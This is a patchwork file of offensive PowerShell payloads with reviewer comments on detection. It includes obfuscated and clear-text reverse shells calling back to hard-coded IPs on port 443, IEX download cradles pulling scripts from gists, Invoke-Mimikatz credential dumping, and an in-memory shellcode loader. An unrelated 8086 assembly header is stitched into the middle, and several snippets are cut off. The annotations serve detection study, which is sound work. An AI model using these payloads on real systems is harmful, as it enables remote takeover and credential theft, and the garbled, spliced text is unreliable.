
# NOTE(review): heavily obfuscated PowerShell (format-operator string reassembly, backtick-split
# variable names, Set-Variable / "ls variable:" indirection instead of a direct [Text.Encoding]
# reference). Stripped of the wrapping it is the same TCPClient / GetStream / Read / iex / Write
# loop as the clear-text reverse shell further down; the host argument decodes to 54.194.214.53
# on port 443. The line is truncated mid-statement at `.Invoke($` in this copy.
# Obfuscation of this kind defeats naive string matching on "TCPClient" or "iex"; AMSI and script
# block logging still see the text that actually reaches Invoke-Expression at run time.
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($
# NOTE(review): string-reversal launcher. The quoted payload is the real command written backwards;
# [regex]::Matches with the 'RightToLeft' option reads it back in order, -join reassembles it, and the
# result is handed to an invoker spelled out of $ShellId characters ($ShellId[1] + $ShellId[13] + 'X').
# The reversed text contains the same gist URL (rev2.ps1) and "Powershell IEX" prefix as the clear-text
# cradle on the next line, so this appears to be that command in disguise. The combination of a
# RightToLeft regex, -join over match values and dynamic invocation of $ShellId fragments is itself a
# usable detection signature.
.( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+57]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) )
# NOTE(review): download-and-execute cradle: Net.WebClient.DownloadString pulls rev2.ps1 from a public
# gist and the text goes straight into IEX, so nothing is written to disk. Practical controls are
# egress filtering of gist.githubusercontent.com from hosts that have no business reaching it, and
# alerting on WebClient.DownloadString feeding Invoke-Expression in process command lines or
# script block logs.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/aaedbf7e5fd9c1b642a203cd7b8a0c9a435bbb96/rev2.ps1')
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
# NOTE(review): clear-text form of the obfuscated loop above. TCPClient connects to the hard-coded
# 10.10.14.126:443, a 64 KiB receive buffer is allocated, each chunk is decoded as ASCII and executed
# with iex (stderr merged into stdout via 2>&1), and the output is returned with a fake "PS <cwd>> "
# prompt. Port 443 is used without TLS, so a network sensor sees both commands and results in clear;
# on the host, script block logging captures every chunk that reaches iex.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# NOTE(review): commented-out minimal variant of the same loop with a different callback
# (192.168.254.1:55555) and no prompt text; behaviourally identical from a detection standpoint.
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
# NOTE(review): loads PowerSploit's Invoke-Mimikatz from raw.githubusercontent.com into memory and
# runs it with -DumpCreds, i.e. credential extraction from LSASS, echoing the result via $m.
# LSA Protection / Credential Guard and alerting on LSASS handle access from powershell.exe are the
# relevant mitigations; the download itself has the same network signature as the gist cradles above.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
# NOTE(review): a further gist-hosted cradle (reverse.ps1) of the same shape as the rev2.ps1 line
# above; the same network and script-block indicators apply.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/c301bfa3dc9e1f7c6f7cabd83777b2a2/raw/d660001da6f5f2ee557396772d0f5d1010198d9d/reverse.ps1)
# NOTE(review): StreamWriter-based reverse shell variant with a hard-coded callback of
# 165.227.163.161:443. "Working" is emitted to the pipeline as a progress marker, then a
# StreamWriter, a 1024-byte receive buffer and an ASCII encoder are set up over the socket's
# stream. The do-loop that exchanges commands and output starts at the `do {` that follows and is
# cut off in this copy. Same clear-text-on-443 and script-block-logging observations as the
# TCPClient variants above.
$socket = new-object System.Net.Sockets.TcpClient('165.227.163.161', 443);
"Working"
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
;====================================================================
; Main.asm file generated by New Project wizard
;
; Created: Cum Mar 11 2016
; Processor: 8086
; Compiler: MASM32
;
; Before starting simulation set Internal Memory Size
; in the 8086 model properties to 0x10000
;====================================================================
# NOTE(review): post-access host enumeration on a Unix target (unlike the Windows snippets
# around it): current user, local account list, kernel/OS version. Each is benign on its own;
# run in sequence immediately after an inbound shell they are the usual first commands, and
# auditd / EDR command-line telemetry keyed on the shell's parent process is where they surface.
whoami
cat /etc/passwd
uname -a
# NOTE(review): in-memory shellcode loader skeleton. The here-string declares P/Invoke signatures
# for VirtualAlloc and CreateThread, and Add-Type compiles them into a Win32Functions.Win32 type
# that is kept via -passthru. The $hbgpyIRNXZNcNzm byte array that follows (truncated in this copy;
# the leading bytes look like x64 code) is the payload those two calls would map and run. The
# randomised identifiers look generator-produced. Detection points: Add-Type with VirtualAlloc /
# CreateThread strings in a script block, powershell.exe spawning the C# compiler (Windows
# PowerShell compiles Add-Type definitions out of process), and unbacked executable memory in the
# PowerShell process.
$knQoUoTfNfL = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
# Compiles the two P/Invoke declarations above into a reusable type object.
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x